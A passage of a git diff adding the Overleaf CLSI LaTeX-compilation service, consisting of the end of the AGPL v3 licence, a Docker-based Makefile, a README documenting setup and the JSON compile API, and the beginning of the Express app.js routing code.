expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. 
If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). 
To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. 
+ + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. 
+
+  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
+THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
+GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
+USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
+DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
+PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
+EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGES.
+
+  17. Interpretation of Sections 15 and 16.
+
+  If the disclaimer of warranty and limitation of liability provided
+above cannot be given local legal effect according to their terms,
+reviewing courts shall apply local law that most closely approximates
+an absolute waiver of all civil liability in connection with the
+Program, unless a warranty or assumption of liability accompanies a
+copy of the Program in return for a fee.
+
+                     END OF TERMS AND CONDITIONS
+
+            How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+state the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
+
+    This program is free software: you can redistribute it and/or modify
+    it under the terms of the GNU Affero General Public License as published by
+    the Free Software Foundation, either version 3 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU Affero General Public License for more details.
+
+    You should have received a copy of the GNU Affero General Public License
+    along with this program.  If not, see <https://www.gnu.org/licenses/>.
+
+Also add information on how to contact you by electronic and paper mail.
+
+  If your software can interact with users remotely through a computer
+network, you should also make sure that it provides a way for users to
+get its source.  For example, if your program is a web application, its
+interface could display a "Source" link that leads users to an archive
+of the code.  There are many ways you could offer source, and different
+solutions will be better for different programs; see section 13 for the
+specific requirements.
+
+  You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU AGPL, see
+<https://www.gnu.org/licenses/>.
diff --git a/services/clsi/Makefile b/services/clsi/Makefile
new file mode 100644
index 0000000..2f673db
--- /dev/null
+++ b/services/clsi/Makefile
@@ -0,0 +1,158 @@
+# This file was auto-generated, do not edit it directly.
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = clsi +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi gcr.io/overleaf-ops/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! 
echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag gcr.io/overleaf-ops/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag gcr.io/overleaf-ops/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from gcr.io/overleaf-ops/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from gcr.io/overleaf-ops/$(PROJECT_NAME):main \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/clsi/README.md b/services/clsi/README.md new file mode 100644 index 0000000..16e40b8 --- /dev/null +++ b/services/clsi/README.md @@ -0,0 +1,188 @@ +overleaf/clsi +=============== + +A web api for compiling LaTeX documents in the cloud + +The Common LaTeX Service Interface (CLSI) provides a RESTful interface to traditional LaTeX tools (or, more generally, any command line tool for composing marked-up documents into a display format such as PDF or HTML). 
The CLSI listens on the following ports by default:
+
+* TCP/3013 - the RESTful interface
+* TCP/3048 - reports load information
+* TCP/3049 - HTTP interface to control the CLSI service
+
+These defaults can be modified in `config/settings.defaults.js`.
+
+The provided `Dockerfile` builds a Docker image which has the Docker command line tools installed. The configuration in `docker-compose-config.yml` mounts the Docker socket, so that the CLSI container can talk to the Docker host it is running on. This allows it to spin up `sibling containers` running an image with a TeX distribution installed to perform the actual compiles.
+
+The CLSI can be configured through the following environment variables:
+
+* `ALLOWED_COMPILE_GROUPS` - Space separated list of allowed compile groups
+* `ALLOWED_IMAGES` - Space separated list of allowed Docker TeX Live images
+* `CATCH_ERRORS` - Set to `true` to log uncaught exceptions
+* `COMPILE_GROUP_DOCKER_CONFIGS` - JSON string of Docker configs for compile groups
+* `COMPILES_HOST_DIR` - Working directory for LaTeX compiles
+* `OUTPUT_HOST_DIR` - Output directory for LaTeX compiles
+* `COMPILE_SIZE_LIMIT` - Sets the body-parser [limit](https://github.com/expressjs/body-parser#limit)
+* `DOCKER_RUNNER` - Set to `true` to use sibling containers
+* `DOCKER_RUNTIME` -
+* `FILESTORE_DOMAIN_OVERRIDE` - The URL for the filestore service, e.g. `http://$FILESTORE_HOST:3009`
+* `FILESTORE_PARALLEL_FILE_DOWNLOADS` - Number of parallel file downloads
+* `LISTEN_ADDRESS` - The address for the RESTful service to listen on. Set to `0.0.0.0` to listen on all network interfaces
+* `PROCESS_LIFE_SPAN_LIMIT_MS` - Process life span limit in milliseconds
+* `SMOKE_TEST` - Whether to run smoke tests
+* `TEXLIVE_IMAGE` - The TeX Live Docker image to use for sibling containers, e.g. `gcr.io/overleaf-ops/texlive-full:2017.1`
+* `TEX_LIVE_IMAGE_NAME_OVERRIDE` - The name of the registry for the Docker image, e.g. `gcr.io/overleaf-ops`
+* `TEXLIVE_IMAGE_USER` - When using sibling containers, the user to run as in the TeX Live image. Defaults to `tex`
+* `TEXLIVE_OPENOUT_ANY` - Sets the `openout_any` environment variable for TeX Live (see the `\openout` primitive [documentation](http://tug.org/texinfohtml/web2c.html#tex-invocation))
+
+Further environment variables configure the [metrics module](https://github.com/overleaf/metrics-module).
+
+Installation
+------------
+
+The CLSI can be installed and set up as part of the entire [Overleaf stack](https://github.com/overleaf/overleaf) (complete with front end editor and document storage), or it can be run as a standalone service. To run it as a standalone service, first check out this repository:
+
+```shell
+git clone git@github.com:overleaf/overleaf.git
+```
+
+Then build the Docker image:
+
+```shell
+docker build . -t overleaf/clsi -f services/clsi/Dockerfile
+```
+
+Then pull the TeX Live image:
+
+```shell
+docker pull texlive/texlive
+```
+
+Then start the Docker container:
+
+```shell
+docker run --rm \
+  -p 127.0.0.1:3013:3013 \
+  -e LISTEN_ADDRESS=0.0.0.0 \
+  -e DOCKER_RUNNER=true \
+  -e TEXLIVE_IMAGE=texlive/texlive \
+  -e TEXLIVE_IMAGE_USER=root \
+  -e COMPILES_HOST_DIR="$PWD/compiles" \
+  -v "$PWD/compiles:/overleaf/services/clsi/compiles" \
+  -v "$PWD/cache:/overleaf/services/clsi/cache" \
+  -v /var/run/docker.sock:/var/run/docker.sock \
+  --name clsi \
+  overleaf/clsi
+```
+
+Note: if you're running the CLSI on macOS you may need to use `-v /var/run/docker.sock.raw:/var/run/docker.sock` instead.
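+
+Once the container is up, you can check that the service is responding. This assumes the default port mapping shown above; the `/status` endpoint simply reports liveness:
+
+```shell
+curl http://localhost:3013/status
+# CLSI is alive
+```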
+
+The CLSI should then be up and running at `http://localhost:3013`.
+
+Important note for Linux users
+==============================
+
+The Node application runs as user `node` in the CLSI, which has uid `1000`. As a consequence of this, the `compiles` folder gets created on your host with `uid` and `gid` set to `1000`.
+
+```shell
+ls -lnd compiles
+```
+> `drwxr-xr-x 2 1000 1000 4096 Mar 19 12:41 compiles`
+
+If there is a user/group on your host which also happens to have `uid` / `gid` `1000` then that user/group will have ownership of the compiles folder on your host.
+
+LaTeX runs in the sibling containers as the user specified in the `TEXLIVE_IMAGE_USER` environment variable. In the example above this is set to `root`, which has uid `0`. This creates a problem with the above permissions, as the root user does not have permission to write to subfolders of `compiles`.
+
+A quick fix is to give the `root` group ownership and read-write permissions to `compiles`, with `setgid` set so that new subfolders also inherit this ownership:
+
+```shell
+sudo chown -R 1000:root compiles
+sudo chmod -R g+w compiles
+sudo chmod g+s compiles
+```
+
+Another solution is to create an `overleaf` group and add both `root` and the user with `uid` `1000` to it. If the host does not have a user with that `uid`, you will need to create one first.
+
+```shell
+sudo useradd --uid 1000 host-node-user # If required
+sudo groupadd overleaf
+sudo usermod -a -G overleaf root
+sudo usermod -a -G overleaf $(id -nu 1000)
+sudo chown -R 1000:overleaf compiles
+sudo chmod -R g+w compiles
+sudo chmod g+s compiles
+```
+
+This is a facet of the way Docker works on Linux. See this [upstream issue](https://github.com/moby/moby/issues/7198).
+
+
+API
+---
+
+The CLSI is based on a JSON API.
+
+#### Example Request
+
+(Note that valid JSON should not contain any comments like the example below).
+
+    POST /project/<project-id>/compile
+
+```json5
+{
+  "compile": {
+    "options": {
+      // Which compiler to use. Can be latex, pdflatex, xelatex or lualatex
+      "compiler": "lualatex",
+      // How many seconds to wait before killing the process. Default is 60.
+      "timeout": 40
+    },
+    // The main file to run LaTeX on
+    "rootResourcePath": "main.tex",
+    // An array of files to include in the compilation. May have either the content
+    // passed directly, or a URL where it can be downloaded.
+    "resources": [
+      {
+        "path": "main.tex",
+        "content": "\\documentclass{article}\n\\begin{document}\nHello World\n\\end{document}"
+      }
+      // ,{
+      //   "path": "image.png",
+      //   "url": "www.example.com/image.png",
+      //   "modified": 123456789 // Unix time since epoch
+      // }
+    ]
+  }
+}
```
+
+With `curl`, if you place the above JSON in a file called `data.json`, the request would look like this:
+
+```shell
+curl -X POST -H 'Content-Type: application/json' -d @data.json http://localhost:3013/project/<project-id>/compile
+```
+
+You can specify any project-id in the URL, and the files and LaTeX environment will be persisted between requests.
+URLs will be downloaded and cached until provided with a more recent modified date.
+A minimal Node version of this request is sketched at the end of this README.
+
+#### Example Response
+
+```json
+{
+  "compile": {
+    "status": "success",
+    "outputFiles": [{
+      "type": "pdf",
+      "url": "http://localhost:3013/project/<project-id>/output/output.pdf"
+    }, {
+      "type": "log",
+      "url": "http://localhost:3013/project/<project-id>/output/output.log"
+    }]
+  }
+}
```
+
+License
+-------
+
+The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file.
+
+Copyright (c) Overleaf, 2014-2021.
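+
+Appendix: a minimal Node client
+-------------------------------
+
+For quick experiments, the compile request documented above can also be sent from a short Node script. This is a sketch, not part of the CLSI codebase: it assumes Node 18+ (for the global `fetch`), a CLSI listening on the default `localhost:3013`, and uses the arbitrary placeholder project id `example-project`.
+
+```js
+// Sketch: POST a single-file compile to a local CLSI and list the output files.
+const projectId = 'example-project' // any id matching /^[a-zA-Z0-9_-]+$/
+
+async function main() {
+  const response = await fetch(
+    `http://localhost:3013/project/${projectId}/compile`,
+    {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      body: JSON.stringify({
+        compile: {
+          options: { compiler: 'pdflatex', timeout: 40 },
+          rootResourcePath: 'main.tex',
+          resources: [
+            {
+              path: 'main.tex',
+              content:
+                '\\documentclass{article}\n\\begin{document}\nHello World\n\\end{document}',
+            },
+          ],
+        },
+      }),
+    }
+  )
+  const body = await response.json()
+  console.log(body.compile.status)
+  for (const file of body.compile.outputFiles || []) {
+    console.log(file.type, file.url)
+  }
+}
+
+main().catch(err => {
+  console.error(err)
+  process.exit(1)
+})
+```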
diff --git a/services/clsi/app.js b/services/clsi/app.js new file mode 100644 index 0000000..8de9d89 --- /dev/null +++ b/services/clsi/app.js @@ -0,0 +1,386 @@ +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const CompileController = require('./app/js/CompileController') +const ContentController = require('./app/js/ContentController') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +logger.initialize('clsi') +const Metrics = require('@overleaf/metrics') + +const smokeTest = require('./test/smoke/js/SmokeTests') +const ContentTypeMapper = require('./app/js/ContentTypeMapper') +const Errors = require('./app/js/Errors') +const { createOutputZip } = require('./app/js/OutputController') + +const Path = require('node:path') + +Metrics.open_sockets.monitor(true) +Metrics.memory.monitor(logger) +Metrics.leaked_sockets.monitor(logger) + +const ProjectPersistenceManager = require('./app/js/ProjectPersistenceManager') +const OutputCacheManager = require('./app/js/OutputCacheManager') +const ContentCacheManager = require('./app/js/ContentCacheManager') + +ProjectPersistenceManager.init() +OutputCacheManager.init() + +const express = require('express') +const bodyParser = require('body-parser') +const app = express() + +Metrics.injectMetricsRoute(app) +app.use(Metrics.http.monitor(logger)) + +// Compile requests can take longer than the default two +// minutes (including file download time), so bump up the +// timeout a bit. +const TIMEOUT = 10 * 60 * 1000 +app.use(function (req, res, next) { + req.setTimeout(TIMEOUT) + res.setTimeout(TIMEOUT) + res.removeHeader('X-Powered-By') + next() +}) + +app.param('project_id', function (req, res, next, projectId) { + if (projectId?.match(/^[a-zA-Z0-9_-]+$/)) { + next() + } else { + next(new Error('invalid project id')) + } +}) + +app.param('user_id', function (req, res, next, userId) { + if (userId?.match(/^[0-9a-f]{24}$/)) { + next() + } else { + next(new Error('invalid user id')) + } +}) + +app.param('build_id', function (req, res, next, buildId) { + if (buildId?.match(OutputCacheManager.BUILD_REGEX)) { + next() + } else { + next(new Error(`invalid build id ${buildId}`)) + } +}) + +app.param('contentId', function (req, res, next, contentId) { + if (contentId?.match(OutputCacheManager.CONTENT_REGEX)) { + next() + } else { + next(new Error(`invalid content id ${contentId}`)) + } +}) + +app.param('hash', function (req, res, next, hash) { + if (hash?.match(ContentCacheManager.HASH_REGEX)) { + next() + } else { + next(new Error(`invalid hash ${hash}`)) + } +}) + +app.post( + '/project/:project_id/compile', + bodyParser.json({ limit: Settings.compileSizeLimit }), + CompileController.compile +) +app.post('/project/:project_id/compile/stop', CompileController.stopCompile) +app.delete('/project/:project_id', CompileController.clearCache) + +app.get('/project/:project_id/sync/code', CompileController.syncFromCode) +app.get('/project/:project_id/sync/pdf', CompileController.syncFromPdf) +app.get('/project/:project_id/wordcount', CompileController.wordcount) +app.get('/project/:project_id/status', CompileController.status) +app.post('/project/:project_id/status', CompileController.status) + +// Per-user containers +app.post( + '/project/:project_id/user/:user_id/compile', + bodyParser.json({ limit: Settings.compileSizeLimit }), + CompileController.compile +) +app.post( + '/project/:project_id/user/:user_id/compile/stop', + CompileController.stopCompile +) 
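+
+// For example (hypothetical ids), a per-user compile is triggered via:
+//   POST /project/my-project-1/user/507f1f77bcf86cd799439011/compile
+// where :project_id must match /^[a-zA-Z0-9_-]+$/ and :user_id must be a
+// 24-character hex string; both are enforced by the app.param checks above.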
+app.delete('/project/:project_id/user/:user_id', CompileController.clearCache) + +app.get( + '/project/:project_id/user/:user_id/sync/code', + CompileController.syncFromCode +) +app.get( + '/project/:project_id/user/:user_id/sync/pdf', + CompileController.syncFromPdf +) +app.get( + '/project/:project_id/user/:user_id/wordcount', + CompileController.wordcount +) + +const ForbidSymlinks = require('./app/js/StaticServerForbidSymlinks') + +// create a static server which does not allow access to any symlinks +// avoids possible mismatch of root directory between middleware check +// and serving the files +const staticOutputServer = ForbidSymlinks( + express.static, + Settings.path.outputDir, + { + setHeaders(res, path, stat) { + if (Path.basename(path) === 'output.pdf') { + // Calculate an etag in the same way as nginx + // https://github.com/tj/send/issues/65 + const etag = (path, stat) => + `"${Math.ceil(+stat.mtime / 1000).toString(16)}` + + '-' + + Number(stat.size).toString(16) + + '"' + res.set('Etag', etag(path, stat)) + } + res.set('Content-Type', ContentTypeMapper.map(path)) + }, + } +) + +// This needs to be before GET /project/:project_id/build/:build_id/output/* +app.get( + '/project/:project_id/build/:build_id/output/output.zip', + bodyParser.json(), + createOutputZip +) + +// This needs to be before GET /project/:project_id/user/:user_id/build/:build_id/output/* +app.get( + '/project/:project_id/user/:user_id/build/:build_id/output/output.zip', + bodyParser.json(), + createOutputZip +) + +app.get( + '/project/:project_id/user/:user_id/build/:build_id/output/*', + function (req, res, next) { + // for specific build get the path from the OutputCacheManager (e.g. .clsi/buildId) + req.url = + `/${req.params.project_id}-${req.params.user_id}/` + + OutputCacheManager.path(req.params.build_id, `/${req.params[0]}`) + staticOutputServer(req, res, next) + } +) + +app.get( + '/project/:projectId/content/:contentId/:hash', + ContentController.getPdfRange +) +app.get( + '/project/:projectId/user/:userId/content/:contentId/:hash', + ContentController.getPdfRange +) + +app.get( + '/project/:project_id/build/:build_id/output/*', + function (req, res, next) { + // for specific build get the path from the OutputCacheManager (e.g. .clsi/buildId) + req.url = + `/${req.params.project_id}/` + + OutputCacheManager.path(req.params.build_id, `/${req.params[0]}`) + staticOutputServer(req, res, next) + } +) + +app.get('/oops', function (req, res, next) { + logger.error({ err: 'hello' }, 'test error') + res.send('error\n') +}) + +app.get('/oops-internal', function (req, res, next) { + setTimeout(function () { + throw new Error('Test error') + }, 1) +}) + +app.get('/status', (req, res, next) => res.send('CLSI is alive\n')) + +Settings.processTooOld = 